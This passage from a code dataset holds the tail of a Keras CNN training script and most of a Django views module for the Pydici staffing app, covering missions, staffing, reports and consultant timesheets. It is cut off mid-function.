= tf.keras.Sequential()\nmodel.add(tf.keras.layers.Conv2D(filters=25, kernel_size=(2,2), activation='relu', padding= \"same\", input_shape=(640, 2, 1)))\nmodel.add(tf.keras.layers.AvgPool2D(pool_size=1))\nmodel.add(tf.keras.layers.Conv2D(filters=10, kernel_size=(2,2), activation='relu', padding= \"same\"))\nmodel.add(tf.keras.layers.AvgPool2D(pool_size=1))\nmodel.add(tf.keras.layers.Conv2D(filters=10, kernel_size=(2,2), activation='relu', padding= \"same\"))\nmodel.add(tf.keras.layers.AvgPool2D(pool_size=1))\nmodel.add(tf.keras.layers.Flatten())\nmodel.add(tf.keras.layers.Dense(64, activation='relu'))\nmodel.add(tf.keras.layers.Dropout(drop_rate))\nmodel.add(tf.keras.layers.Dense(4, activation='relu'))\nmodel.compile(loss=loss, optimizer=optimizer, metrics=['accuracy'])\nmodel.summary()\nhistory = model.fit(x_train_resh, y_train, epochs=100, batch_size=5, validation_data=(x_test_resh, y_test))\n\n\nprint(model.predict(x_test_resh[:4]))\nprint(y_test[:4])","sub_path":"models/model#5_sub_by_sub_2d.py","file_name":"model#5_sub_by_sub_2d.py","file_ext":"py","file_size_in_byte":3991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"134860591","text":"# coding: utf-8\n\"\"\"\nPydici staffing views. Http request are processed here.\n@author: Sébastien Renard (sebastien.renard@digitalfox.org)\n@license: AGPL v3 or newer (http://www.gnu.org/licenses/agpl-3.0.html)\n\"\"\"\n\nfrom datetime import date, timedelta, datetime\nimport csv\nimport json\nfrom itertools import zip_longest\n\nfrom django.core.cache import cache\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponseRedirect, HttpResponse, Http404\nfrom django.contrib.auth.decorators import permission_required\nfrom django.forms.models import inlineformset_factory\nfrom django.utils.translation import ugettext as _\nfrom django.urls import reverse, reverse_lazy\nfrom django.db.models import Sum, Count, Q, Max\nfrom django.db import connections\nfrom django.utils.safestring import mark_safe\nfrom django.utils.html import escape\nfrom django.utils import formats\nfrom django.views.decorators.cache import cache_page, cache_control\nfrom django.utils.decorators import method_decorator\nfrom django.views.generic.edit import UpdateView\nfrom django.contrib import messages\nfrom django.conf import settings\nfrom django.template.loader import get_template\n\nfrom django_weasyprint import WeasyTemplateView\n\nfrom .models import Staffing, Mission, Holiday, Timesheet, FinancialCondition, LunchTicket\nfrom people.models import Consultant, Subsidiary\nfrom leads.models import Lead\nfrom people.models import ConsultantProfile\nfrom .forms import ConsultantStaffingInlineFormset, MissionStaffingInlineFormset, \\\n TimesheetForm, MassStaffingForm, MissionContactsForm\nfrom core.utils import working_days, nextMonth, previousMonth, daysOfMonth, previousWeek, nextWeek, monthWeekNumber, \\\n to_int_or_round, COLORS, convertDictKeyToDate, cumulateList, user_has_feature, get_parameter, get_fiscal_years\nfrom core.decorator import pydici_non_public, pydici_feature, PydiciNonPublicdMixin\nfrom .utils import gatherTimesheetData, saveTimesheetData, saveFormsetAndLog, \\\n sortMissions, holidayDays, staffingDates, time_string_for_day_percent, compute_automatic_staffing, \\\n timesheet_report_data\nfrom .forms import MissionForm, MissionAutomaticStaffingForm\nfrom people.utils import getScopes\n\nTIMESTRING_FORMATTER = {\n 'cycle': formats.number_format,\n 'keyboard': time_string_for_day_percent\n}\n\n\nTIMESHEET_ACCESS_NOT_ALLOWED = 'N'\nTIMESHEET_ACCESS_READ_ONLY = 'RO'\nTIMESHEET_ACCESS_READ_WRITE = 'RW'\n\n\ndef check_user_timesheet_access(user, consultant, timesheet_month):\n \"\"\"\n Check if the user is allowed to access the requested timesheet.\n Returns one of the `TIMESHEET_ACCESS_*` constants.\n \"\"\"\n current_month = date.today().replace(day=1)\n timesheet_next_month = (timesheet_month + timedelta(days=40)).replace(day=1)\n ontime_editing = (current_month == timesheet_month) or (date.today() - timesheet_next_month).days <= 3\n\n if (user.has_perm(\"staffing.add_timesheet\") and\n user.has_perm(\"staffing.change_timesheet\") and\n user.has_perm(\"staffing.delete_timesheet\")):\n return TIMESHEET_ACCESS_READ_WRITE\n\n try:\n trigramme = user.username.upper()\n user_consultant = Consultant.objects.get(trigramme=trigramme)\n except Consultant.DoesNotExist:\n return TIMESHEET_ACCESS_NOT_ALLOWED\n\n if user_consultant.id == consultant.id or consultant in user_consultant.team():\n # User is accessing his own timesheet and timesheet of his team\n # A consultant can only edit his own timesheet on current month and 3 days after\n if ontime_editing :\n return TIMESHEET_ACCESS_READ_WRITE\n else:\n return TIMESHEET_ACCESS_READ_ONLY\n\n # User is accessing the timesheet of another user\n if user_consultant.subcontractor:\n return TIMESHEET_ACCESS_NOT_ALLOWED\n\n if user_has_feature(user, \"timesheet_all\"):\n return TIMESHEET_ACCESS_READ_ONLY\n\n if user_has_feature(user, \"timesheet_current_month\"):\n if timesheet_month >= current_month:\n return TIMESHEET_ACCESS_READ_ONLY\n else:\n return TIMESHEET_ACCESS_NOT_ALLOWED\n else:\n return TIMESHEET_ACCESS_NOT_ALLOWED\n\n\n@pydici_non_public\ndef missions(request, onlyActive=True):\n \"\"\"List of missions\"\"\"\n if onlyActive:\n data_url = reverse('staffing:active_mission_table_DT')\n else:\n data_url = reverse('staffing:all_mission_table_DT')\n return render(request, \"staffing/missions.html\",\n {\"all\": not onlyActive,\n \"data_url\": data_url,\n \"datatable_options\": ''' \"columnDefs\": [{ \"orderable\": false, \"targets\": [4, 6, 7, 8] },\n { className: \"hidden-xs hidden-sm hidden-md\", \"targets\": [6,7]}],\n \"order\": [[0, \"asc\"]] ''',\n \"user\": request.user})\n\n\n@pydici_non_public\ndef mission_home(request, mission_id):\n \"\"\"Home page of mission description - this page loads all others mission sub-pages\"\"\"\n mission = Mission.objects.get(id=mission_id)\n return render(request, 'staffing/mission.html',\n {\"mission\": mission,\n \"user\": request.user})\n\n\n@pydici_non_public\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef mission_staffing(request, mission_id, form_mode=\"manual\"):\n \"\"\"Edit mission staffing. form_mode determine if staffing is done manually (manual) or automatically (automatic)\"\"\"\n if (request.user.has_perm(\"staffing.add_staffing\") and\n request.user.has_perm(\"staffing.change_staffing\") and\n request.user.has_perm(\"staffing.delete_staffing\")):\n readOnly = False\n else:\n readOnly = True\n\n if not request.META.get('HTTP_X_REQUESTED_WITH') == 'XMLHttpRequest':\n # This view should only be accessed by ajax request. Redirect lost users\n return redirect(\"staffing:mission_home\", mission_id)\n\n StaffingFormSet = inlineformset_factory(Mission, Staffing,\n formset=MissionStaffingInlineFormset,\n fields=\"__all__\")\n mission = Mission.objects.get(id=mission_id)\n if request.method == \"POST\":\n if readOnly:\n # Readonly users should never go here !\n return HttpResponseRedirect(reverse(\"core:forbiden\"))\n if form_mode==\"manual\":\n formset = StaffingFormSet(request.POST, instance=mission)\n if formset.is_valid():\n saveFormsetAndLog(formset, request)\n else:\n form = MissionAutomaticStaffingForm(request.POST)\n if form.is_valid():\n compute_automatic_staffing(mission, form.cleaned_data[\"mode\"], int(form.cleaned_data[\"duration\"]), user=request.user)\n\n formset = StaffingFormSet(instance=mission) # An unbound form\n\n # flush mission cache\n cache.delete(\"Mission.forecasted_work%s\" % mission.id )\n cache.delete(\"Mission.done_work%s\" % mission.id)\n\n return render(request, 'staffing/mission_staffing.html',\n {\"formset\": formset,\n \"mission\": mission,\n \"margin\": mission.margin(mode=\"target\"),\n \"automatic_staffing_form\": MissionAutomaticStaffingForm(),\n \"read_only\": readOnly,\n \"staffing_dates\": staffingDates(),\n \"user\": request.user})\n\n\n@pydici_non_public\n@pydici_feature(\"staffing\")\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef consultant_staffing(request, consultant_id):\n \"\"\"Edit consultant staffing\"\"\"\n consultant = Consultant.objects.get(id=consultant_id)\n\n if not (request.user.has_perm(\"staffing.add_staffing\") and\n request.user.has_perm(\"staffing.change_staffing\") and\n request.user.has_perm(\"staffing.delete_staffing\")):\n # Only forbid access if the user try to edit someone else staffing\n if request.user.username.upper() != consultant.trigramme:\n return HttpResponseRedirect(reverse(\"core:forbiden\"))\n\n StaffingFormSet = inlineformset_factory(Consultant, Staffing,\n formset=ConsultantStaffingInlineFormset, fields=\"__all__\")\n\n if request.method == \"POST\":\n formset = StaffingFormSet(request.POST, instance=consultant)\n if formset.is_valid():\n saveFormsetAndLog(formset, request)\n formset = StaffingFormSet(instance=consultant) # Recreate a new form for next update\n else:\n formset = StaffingFormSet(instance=consultant) # An unbound form\n\n return render(request, 'staffing/consultant_staffing.html',\n {\"formset\": formset,\n \"consultant\": consultant,\n \"staffing_dates\": staffingDates(),\n \"user\": request.user})\n\n\n@pydici_non_public\n@pydici_feature(\"staffing_mass\")\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef mass_staffing(request):\n \"\"\"Massive staffing form\"\"\"\n staffing_dates = [(i, formats.date_format(i, format=\"YEAR_MONTH_FORMAT\")) for i in staffingDates(format=\"datetime\")]\n now = datetime.now().replace(microsecond=0) # Remove useless microsecond that pollute form validation in callback\n if request.method == 'POST': # If the form has been submitted...\n form = MassStaffingForm(request.POST, staffing_dates=staffing_dates)\n if form.is_valid(): # All validation rules pass\n # Process the data in form.cleaned_data\n if form.cleaned_data[\"all_consultants\"]:\n # Get all active, productive non subcontractors consultants\n consultants = Consultant.objects.filter(active=True, productive=True, subcontractor=False)\n else:\n # Use selected consultants\n consultants = form.cleaned_data[\"consultants\"]\n for mission in form.cleaned_data[\"missions\"]:\n for consultant in consultants:\n for staffing_date in form.cleaned_data[\"staffing_dates\"]:\n staffing_date = date(*[int(i) for i in staffing_date.split(\"-\")])\n staffing, created = Staffing.objects.get_or_create(consultant=consultant,\n mission=mission,\n staffing_date=staffing_date,\n defaults={\"consultant\": consultant,\n \"mission\": mission,\n \"staffing_date\": staffing_date})\n staffing.charge = form.cleaned_data[\"charge\"]\n staffing.comment = form.cleaned_data[\"comment\"]\n staffing.update_date = now\n staffing.last_user = str(request.user)\n staffing.save()\n # Redirect to self to display a new unbound form\n messages.add_message(request, messages.INFO, _(\"Staffing has been updated\"))\n return HttpResponseRedirect(reverse(\"staffing:mass_staffing\"))\n else:\n # An unbound form\n form = MassStaffingForm(staffing_dates=staffing_dates)\n\n return render(request, \"staffing/mass_staffing.html\",\n {\"form\": form,\n \"staffing_dates\": staffing_dates})\n\n\n@pydici_non_public\n@pydici_feature(\"staffing_mass\")\ndef pdc_review(request, year=None, month=None):\n \"\"\"PDC overview\n @param year: start date year. None means current year\n @param year: start date year. None means current month,\n Request option parameters:\n - team: only display this team (staffing manager id)\n - subsidiary: only display this subsidiary (subsidiary id)\n - n_month: number of month to display in forceast\n - projection: projection mode (nonce, balanced, full) used to filter still-not-won leads\"\"\"\n\n team = None\n subsidiary = None\n\n # Various projections modes. Value is (\"short name\", \"description\")\n projections = {\"none\": (_(u\"Only won leads\"), _(u\"Only consider won leads for staffing forecasting\")),\n \"balanced\": (_(u\"Balanced staffing projection\"), _(u\"Add missions forcecast staffing even if still not won with a ponderation based on the mission won probability\")),\n \"full\": (_(u\"Full staffing projection\"), _(u\"Add missions forcecast staffing even if still not won without any ponderation. All forecast is considered.\"))}\n\n # Group by modes. Value is label\n groups = {\"manager\": _(u\"Group by Manager\"),\n \"level\": _(u\"Group by Level\")}\n\n # Get team and subsidiary\n if \"team_id\" in request.GET:\n team = Consultant.objects.get(id=int(request.GET[\"team_id\"]))\n if \"subsidiary_id\" in request.GET:\n subsidiary = Subsidiary.objects.get(id=int(request.GET[\"subsidiary_id\"]))\n\n # Don't display this page if no productive consultant are defined\n people = Consultant.objects.filter(productive=True).filter(active=True).filter(subcontractor=False)\n if team:\n people = people.filter(staffing_manager=team)\n if subsidiary:\n people = people.filter(staffing_manager__company=subsidiary)\n people_count = people.count()\n if people_count == 0:\n # TODO: make this message nice\n return HttpResponse(_(\"No productive consultant defined !\"))\n\n n_month = 4 # Default number of month to display\n\n if \"n_month\" in request.GET:\n try:\n n_month = int(request.GET[\"n_month\"])\n if n_month > 12:\n n_month = 12 # Limit to 12 month to avoid complex and useless month list computation\n except ValueError:\n pass\n\n projection = \"balanced\"\n if \"projection\" in request.GET:\n if request.GET[\"projection\"] in (\"none\", \"balanced\", \"full\"):\n projection = request.GET[\"projection\"]\n\n groupby = \"manager\"\n if \"groupby\" in request.GET:\n if request.GET[\"groupby\"] in (\"manager\", \"level\"):\n groupby = request.GET[\"groupby\"]\n\n if year and month:\n start_date = date(int(year), int(month), 1)\n else:\n start_date = date.today()\n start_date = start_date.replace(day=1) # We use the first day to represent month\n\n staffing = {} # staffing data per month and per consultant\n total = {} # total staffing data per month\n rates = [] # staffing rates per month\n available_month = {} # available working days per month\n months = [] # list of month to be displayed\n\n #TODO: simplify this !! Use nextMonth\n for i in range(n_month):\n if start_date.month + i <= 12:\n months.append(start_date.replace(month=start_date.month + i))\n else:\n # We wrap around a year (max one year)\n months.append(start_date.replace(month=start_date.month + i - 12, year=start_date.year + 1))\n\n previous_slice_date = start_date - timedelta(days=(28 * n_month))\n next_slice_date = start_date + timedelta(days=(31 * n_month))\n\n # Initialize total dict and available dict\n holidays_days = Holiday.objects.all().values_list(\"day\", flat=True)\n for month in months:\n total[month] = {\"prod\": 0, \"unprod\": 0, \"holidays\": 0, \"available\": 0, \"total\": 0}\n available_month[month] = working_days(month, holidays_days)\n\n # Get consultants staffing\n consultants = Consultant.objects.filter(productive=True).filter(active=True).filter(subcontractor=False).select_related(\"staffing_manager\")\n if team:\n consultants = consultants.filter(staffing_manager=team)\n if subsidiary :\n consultants = consultants.filter(company=subsidiary)\n for consultant in consultants:\n staffing[consultant] = []\n missions = set()\n for month in months:\n if projection in (\"balanced\", \"full\"):\n # Only exclude null (0%) mission\n current_staffings = consultant.staffing_set.filter(staffing_date=month, mission__probability__gt=0).order_by()\n else:\n # Only keep 100% mission\n current_staffings = consultant.staffing_set.filter(staffing_date=month, mission__probability=100).order_by()\n\n # Sum staffing\n prod = []\n unprod = []\n holidays = []\n for current_staffing in current_staffings.select_related(\"mission__lead__client__organisation__company\"):\n nature = current_staffing.mission.nature\n if nature == \"PROD\":\n missions.add(current_staffing.mission) # Store prod missions for this consultant\n if projection == \"full\":\n prod.append(current_staffing.charge)\n else:\n prod.append(current_staffing.charge * current_staffing.mission.probability / 100)\n elif nature == \"NONPROD\":\n if projection == \"full\":\n unprod.append(current_staffing.charge)\n else:\n unprod.append(current_staffing.charge * current_staffing.mission.probability / 100)\n elif nature == \"HOLIDAYS\":\n if projection == \"full\":\n holidays.append(current_staffing.charge)\n else:\n holidays.append(current_staffing.charge * current_staffing.mission.probability / 100)\n\n # Staffing computation\n prod = sum(prod)\n unprod = sum(unprod)\n holidays = sum(holidays)\n prod_round = to_int_or_round(prod)\n unprod_round = to_int_or_round(unprod)\n holidays_round = to_int_or_round(holidays)\n available = available_month[month] - (prod + unprod + holidays)\n available_displayed = to_int_or_round(available_month[month] - (prod_round + unprod_round + holidays_round))\n staffing[consultant].append([prod_round, unprod_round, holidays_round, available_displayed])\n total[month][\"prod\"] += prod\n total[month][\"unprod\"] += unprod\n total[month][\"holidays\"] += holidays\n total[month][\"available\"] += available\n total[month][\"total\"] += available_month[month]\n # Add client synthesis to staffing dict\n company = set([m.lead.client.organisation.company for m in list(missions) if m.lead is not None])\n client_list = \", \".join([\"%s\" %\n (reverse(\"crm:company_detail\", args=[c.id]), str(c)) for c in company])\n client_list = \"\" % client_list\n staffing[consultant].append([client_list])\n\n # Compute indicator rates\n for month in months:\n rate = []\n ndays = people_count * available_month[month] # Total days for this month\n for indicator in (\"prod\", \"unprod\", \"holidays\", \"available\"):\n if indicator == \"holidays\":\n rate.append(100.0 * total[month][indicator] / ndays)\n else:\n rate.append(100.0 * total[month][indicator] / (ndays - total[month][\"holidays\"]))\n rates.append(list(map(to_int_or_round, rate)))\n\n # Format total dict into list\n total = list(total.items())\n total.sort(key=lambda x: x[0]) # Sort according date\n # Remove date, and transform dict into ordered list:\n total = [(to_int_or_round(i[1][\"prod\"]),\n to_int_or_round(i[1][\"unprod\"]),\n to_int_or_round(i[1][\"holidays\"]),\n to_int_or_round(i[1][\"total\"] - (to_int_or_round(i[1][\"prod\"]) + to_int_or_round(i[1][\"unprod\"]) + to_int_or_round(i[1][\"holidays\"])))) for i in total]\n\n # Order staffing list\n staffing = list(staffing.items())\n staffing.sort(key=lambda x: x[0].name) # Sort by name\n if groupby == \"manager\":\n staffing.sort(key=lambda x: str(x[0].staffing_manager)) # Sort by staffing manager\n else:\n staffing.sort(key=lambda x: x[0].profil.level) # Sort by level\n\n scopes, scope_current_filter, scope_current_url_filter = getScopes(subsidiary, team)\n if team:\n team_name = _(u\"team %(manager_name)s\") % {\"manager_name\": team}\n else:\n team_name = None\n\n return render(request, \"staffing/pdc_review.html\",\n {\"staffing\": staffing,\n \"months\": months,\n \"total\": total,\n \"rates\": rates,\n \"user\": request.user,\n \"projection\": projection,\n \"projection_label\" : projections[projection][0],\n \"projections\": projections,\n \"previous_slice_date\": previous_slice_date,\n \"next_slice_date\": next_slice_date,\n \"start_date\": start_date,\n \"groupby\": groupby,\n \"groupby_label\": groups[groupby],\n \"groups\": groups,\n \"scope\": subsidiary or team_name or _(u\"Everybody\"),\n \"scope_current_filter\" : scope_current_filter,\n \"scope_current_url_filter\": scope_current_url_filter,\n \"scopes\": scopes,})\n\n\n@pydici_non_public\n@pydici_feature(\"staffing_mass\")\n@cache_page(10)\ndef pdc_detail(request, consultant_id, staffing_date):\n \"\"\"Display detail of consultant staffing for this month\"\"\"\n try:\n consultant = Consultant.objects.get(id=consultant_id)\n except Consultant.DoesNotExist:\n raise Http404\n try:\n month = date(int(staffing_date[0:4]), int(staffing_date[4:6]), 1)\n except (ValueError, IndexError):\n raise Http404\n\n staffings = Staffing.objects.filter(mission__active=True, consultant=consultant, staffing_date__gte=month, staffing_date__lt=nextMonth(month))\n return render(request, \"staffing/pdc_detail.html\",\n {\"staffings\": staffings,\n \"user\": request.user})\n\n\n@pydici_non_public\n@pydici_feature(\"reports\")\ndef prod_report(request, year=None, month=None):\n \"\"\"Report production by each people and team for each month\"\"\"\n #TODO: extract that in CSV as well\n\n team = None\n subsidiary = None\n months = []\n n_month = 5\n tooltip_template = get_template(\"staffing/_consultant_prod_tooltip.html\")\n\n all_status = {\"ok\": \"#43E707\",\n \"ko\": \"#E76F6F\",\n \"ok_but_daily_rate\": \"#CCE7B2\",\n \"ok_but_prod_date\": \"#A2E774\",\n \"ko_but_daily_rate\": \"#E7E36D\",\n \"ko_but_prod_date\": \"#F99E9E\"}\n\n # Get time frame\n if year and month:\n end_date = date(int(year), int(month), 1)\n if end_date > date.today():\n end_date = date.today().replace(day=1)\n else:\n end_date = date.today().replace(day=1)\n\n start_date = (end_date - timedelta(30 * n_month)).replace(day=1)\n\n current_date = start_date\n while current_date < end_date:\n current_date = nextMonth(current_date)\n months.append(current_date)\n\n previous_slice_date = end_date - timedelta(days=(28 * n_month))\n next_slice_date = end_date + timedelta(days=(31 * n_month))\n\n # Get team and subsidiary\n if \"team_id\" in request.GET:\n team = Consultant.objects.get(id=int(request.GET[\"team_id\"]))\n if \"subsidiary_id\" in request.GET:\n subsidiary = Subsidiary.objects.get(id=int(request.GET[\"subsidiary_id\"]))\n\n # Filter on scope\n consultants = Consultant.objects.filter(productive=True).filter(active=True).filter(\n subcontractor=False).select_related(\"staffing_manager\")\n if team:\n consultants = consultants.filter(staffing_manager=team)\n if subsidiary:\n consultants = consultants.filter(company=subsidiary)\n\n holidays_days = Holiday.objects.filter(day__gte=start_date, day__lte=end_date).values_list(\"day\", flat=True)\n data = []\n totalDone = {}\n totalForecasted = {}\n\n for consultant in consultants:\n consultantData = []\n for month in months:\n if month not in totalDone:\n totalDone[month] = 0\n if month not in totalForecasted:\n totalForecasted[month] = 0\n upperBound = min(date.today(), nextMonth(month))\n month_days = working_days(month, holidays=holidays_days, upToToday=True)\n timesheets = Timesheet.objects.filter(consultant=consultant,\n charge__gt=0,\n working_date__gte=month,\n working_date__lt=upperBound)\n consultant_days = dict(timesheets.values_list(\"mission__nature\").order_by(\"mission__nature\").annotate(Sum(\"charge\")))\n\n try:\n daily_rate_obj = consultant.getRateObjective(workingDate=month, rate_type=\"DAILY_RATE\").rate\n prod_rate_obj = float(consultant.getRateObjective(workingDate=month, rate_type=\"PROD_RATE\").rate) / 100\n forecast = int(daily_rate_obj * prod_rate_obj * (month_days - consultant_days.get(\"HOLIDAYS\",0)))\n except AttributeError:\n prod_rate_obj = daily_rate_obj = forecast = 0 # At least one rate objective is missing\n turnover = int(consultant.getTurnover(month, upperBound))\n try:\n prod_rate = consultant_days.get(\"PROD\", 0) / (consultant_days.get(\"PROD\", 0) + consultant_days.get(\"NONPROD\", 0))\n except ZeroDivisionError:\n prod_rate = 0\n if consultant_days.get(\"PROD\", 0) > 0:\n daily_rate = turnover / consultant_days[\"PROD\"]\n else:\n daily_rate = 0\n if turnover >= forecast:\n if prod_rate < prod_rate_obj:\n status = all_status[\"ok_but_prod_date\"]\n elif daily_rate < daily_rate_obj:\n status = all_status[\"ok_but_daily_rate\"]\n else:\n status = all_status[\"ok\"]\n else:\n if prod_rate >= prod_rate_obj:\n status = all_status[\"ko_but_prod_date\"]\n elif daily_rate >= daily_rate_obj:\n status = all_status[\"ko_but_daily_rate\"]\n else:\n status = all_status[\"ko\"]\n tooltip = tooltip_template.render({\"daily_rate\": daily_rate, \"daily_rate_obj\": daily_rate_obj, \"prod_rate\": prod_rate * 100, \"prod_rate_obj\": prod_rate_obj * 100})\n consultantData.append([status, tooltip, [formats.number_format(turnover), formats.number_format(forecast)]]) # For each month : [status, [turnover, forceast ]]\n totalDone[month] += turnover\n totalForecasted[month] += forecast\n data.append([consultant, consultantData])\n\n # Add total\n totalData = []\n for month in months:\n forecast = totalForecasted[month]\n turnover = totalDone[month]\n if forecast > turnover:\n status = all_status[\"ko\"]\n else:\n status = all_status[\"ok\"]\n totalData.append([status, \"\", [formats.number_format(turnover), formats.number_format(forecast)]])\n data.append([None, totalData])\n\n # Get scopes\n scopes, scope_current_filter, scope_current_url_filter = getScopes(subsidiary, team)\n if team:\n team_name = _(u\"team %(manager_name)s\") % {\"manager_name\": team}\n else:\n team_name = None\n\n return render(request, \"staffing/prod_report.html\",\n {\"data\": data,\n \"months\": months,\n \"end_date\" : end_date,\n \"previous_slice_date\": previous_slice_date,\n \"next_slice_date\": next_slice_date,\n \"scope\": subsidiary or team_name or _(u\"Everybody\"),\n \"scope_current_filter\": scope_current_filter,\n \"scope_current_url_filter\": scope_current_url_filter,\n \"scopes\": scopes })\n\n@pydici_non_public\n@pydici_feature(\"reports\")\ndef fixed_price_missions_report(request):\n \"\"\"Report current fixed price mission margin\"\"\"\n data = []\n\n missions = Mission.objects.filter(active=True, nature=\"PROD\", billing_mode=\"FIXED_PRICE\")\n\n # Get team and subsidiary\n if \"subsidiary_id\" in request.GET:\n subsidiary = Subsidiary.objects.get(id=int(request.GET[\"subsidiary_id\"]))\n missions = missions.filter(subsidiary=subsidiary)\n else:\n subsidiary = None\n\n for mission in missions.select_related():\n #TODO: we mess up with objective margin that is computed for current but not target margin. Same issue in mission_tiemsheet page\n current_margin = round(mission.margin() + sum(mission.objectiveMargin().values()) / 1000, 1)\n target_margin = round(mission.margin(mode=\"target\"), 1)\n data.append((mission, round(mission.done_work_k()[1],1), current_margin, target_margin))\n\n # Get scopes\n scopes, scope_current_filter, scope_current_url_filter = getScopes(subsidiary, None, target=\"subsidiary\")\n\n return render(request, \"staffing/fixed_price_report.html\",\n {\"data\": data,\n \"scope\": subsidiary or _(u\"Everybody\"),\n \"scope_current_filter\": scope_current_filter,\n \"scope_current_url_filter\": scope_current_url_filter,\n \"scopes\": scopes })\n\n\n@pydici_non_public\ndef deactivate_mission(request, mission_id):\n \"\"\"Deactivate the given mission\"\"\"\n try:\n error = False\n mission = Mission.objects.get(id=mission_id)\n mission.active = False\n mission.save()\n except Mission.DoesNotExist:\n error = True\n return HttpResponse(json.dumps({\"error\": error, \"id\": mission_id}),\n content_type=\"application/json\")\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef consultant_timesheet(request, consultant_id, year=None, month=None, week=None):\n \"\"\"Consultant timesheet\"\"\"\n\n # We use the first day to represent month\n if year and month:\n month = date(int(year), int(month), 1)\n else:\n month = date.today().replace(day=1)\n\n if week:\n week = int(week)\n\n if date.today().replace(day=1) == month:\n today = datetime.today().day\n else:\n today = 0\n\n forecastTotal = {} # forecast charge (value) per mission (key is mission.id)\n missions = set() # Set of all consultant missions for this month\n days = daysOfMonth(month, week=week) # List of days in month\n\n if week:\n previous_date = previousWeek(days[0])\n next_date = nextWeek(days[0])\n previous_week = monthWeekNumber(previous_date)\n next_week = monthWeekNumber(next_date)\n else:\n previous_date = (month - timedelta(days=5)).replace(day=1)\n next_date = (month + timedelta(days=40)).replace(day=1)\n previous_week = 0\n next_week = 0\n\n notAllowed = HttpResponseRedirect(reverse(\"core:forbiden\"))\n\n consultant = Consultant.objects.get(id=consultant_id)\n\n access = check_user_timesheet_access(request.user, consultant, month)\n\n if access == TIMESHEET_ACCESS_NOT_ALLOWED:\n return notAllowed\n readOnly = access == TIMESHEET_ACCESS_READ_ONLY\n\n staffings = Staffing.objects.filter(consultant=consultant)\n staffings = staffings.filter(staffing_date=month)\n for staffing in staffings.select_related(\"mission\"):\n if staffing.mission.id in forecastTotal:\n forecastTotal[staffing.mission.id] += staffing.charge\n else:\n forecastTotal[staffing.mission.id] = staffing.charge\n\n # Missions with already defined timesheet or forecasted for this month\n missions = set(list(consultant.forecasted_missions(month=month)) + list(consultant.timesheet_missions(month=month)))\n missions = sortMissions(missions)\n\n # Add zero forecast for mission with active timesheet but no more forecast\n for mission in missions:\n if not mission.id in forecastTotal:\n forecastTotal[mission.id] = 0\n\n if \"csv\" in request.GET:\n return consultant_csv_timesheet(request, consultant, days, month, missions)\n\n timesheetData, timesheetTotal, warning = gatherTimesheetData(consultant, missions, month)\n\n holiday_days = holidayDays(month=month)\n\n if request.method == 'POST': # If the form has been submitted...\n if readOnly:\n # We should never go here as validate button is not displayed when read only...\n # This is just a security control\n return HttpResponseRedirect(reverse(\"core:forbiden\"))\n form = TimesheetForm(request.POST, days=days, missions=missions, holiday_days=holiday_days, showLunchTickets=not consultant.subcontractor,\n forecastTotal=forecastTotal, timesheetTotal=timesheetTotal)\n if form.is_valid(): # All validation rules pass\n # Process the data in form.cleaned_data\n saveTimesheetData(consultant, month, form.cleaned_data, timesheetData)\n # Recreate a new form for next update and compute again totals\n timesheetData, timesheetTotal, warning = gatherTimesheetData(consultant, missions, month)\n form = TimesheetForm(days=days, missions=missions, holiday_days=holiday_days, showLunchTickets=not consultant.subcontractor,\n forecastTotal=forecastTotal, timesheetTotal=timesheetTotal, initial=timesheetData)\n else:\n # An unbound form\n form = TimesheetForm(days=days, missions=missions, holiday_days=holiday_days, showLunchTickets=not consultant.subcontractor,\n forecastTotal=forecastTotal, timesheetTotal=timesheetTotal, initial=timesheetData)\n\n # Compute workings days of this month and compare it to declared days\n wDays = working_days(month, holiday_days)\n wDaysBalance = wDays - (sum(timesheetTotal.values()) - timesheetTotal[\"ticket\"])\n\n # Shrink warning list to given week if week number is given\n if week:\n warning = warning[days[0].day - 1:days[-1].day]\n\n previous_date_enabled = check_user_timesheet_access(request.user, consultant, previous_date.replace(day=1)) != TIMESHEET_ACCESS_NOT_ALLOWED\n\n return render(request, \"staffing/consultant_timesheet.html\",\n {\"consultant\": consultant,\n \"form\": form,\n \"read_only\": readOnly,\n \"days\": days,\n \"month\": month,\n \"week\": week or 0,\n \"missions\": missions,\n \"working_days_balance\": wDaysBalance,\n \"working_days\": wDays,\n \"warning\": warning,\n \"next_date\": next_date,\n \"previous_date\": previous_date,\n \"previous_date_enabled\": previous_date_enabled,\n \"previous_week\": previous_week,\n \"next_week\": next_week,\n \"today\": today,\n \"is_current_month\": month == date.today().replace(day=1),\n \"user\": request.user})\n\n\ndef consultant_csv_timesheet(request, consultant, days, month, missions):\n \"\"\"@return: csv timesheet for a given consultant\"\"\"\n # This \"view\" is never called directly but only through consultant_timesheet view\n response = HttpResponse(content_type=\"text/csv\")\n response[\"Content-Disposition\"] = \"attachment; filename=%s\" % _(\"timesheet.csv\")\n writer = csv.writer(response, delimiter=';')\n\n # Header\n writer.writerow([\"%s - %s\" % (consultant, month), ])\n\n # Days\n writer.writerow([\"\", \"\"] + [d.day for d in days])\n writer.writerow([_(\"Mission\"), _(\"Deal id\")]\n + [_(d.strftime(\"%a\")) for d in days] + [_(\"total\")])\n\n timestring_formatter = TIMESTRING_FORMATTER[settings.TIMESHEET_INPUT_METHOD]\n\n for mission in missions:\n total = 0\n row = [mission, mission.mission_id()]\n timesheets = Timesheet.objects.select_related().filter(consultant=consultant).filter(mission=mission)\n for day in days:\n try:\n timesheet = timesheets.get(working_date=day)\n row.append(timestring_formatter(timesheet.charge))\n total += timesheet.charge\n except Timesheet.DoesNotExist:\n row.append(\"\")\n row.append(formats.number_format(total))\n writer.writerow(row)\n\n return response\n\n\n@pydici_non_public\ndef mission_timesheet(request, mission_id):\n \"\"\"Mission timesheet\"\"\"\n dateTrunc = connections[Timesheet.objects.db].ops.date_trunc_sql # Shortcut to SQL date trunc function\n mission = Mission.objects.get(id=mission_id)\n current_month = date.today().replace(day=1) # Current month\n consultants = mission.consultants()\n consultant_rates = mission.consultant_rates()\n\n if \"csv\" in request.GET:\n return mission_csv_timesheet(request, mission, consultants)\n if \"pdf\" in request.GET:\n return MissionTimesheetReportPdf.as_view()(request, mission=mission)\n\n if not request.META.get('HTTP_X_REQUESTED_WITH') == 'XMLHttpRequest':\n # This view should only be 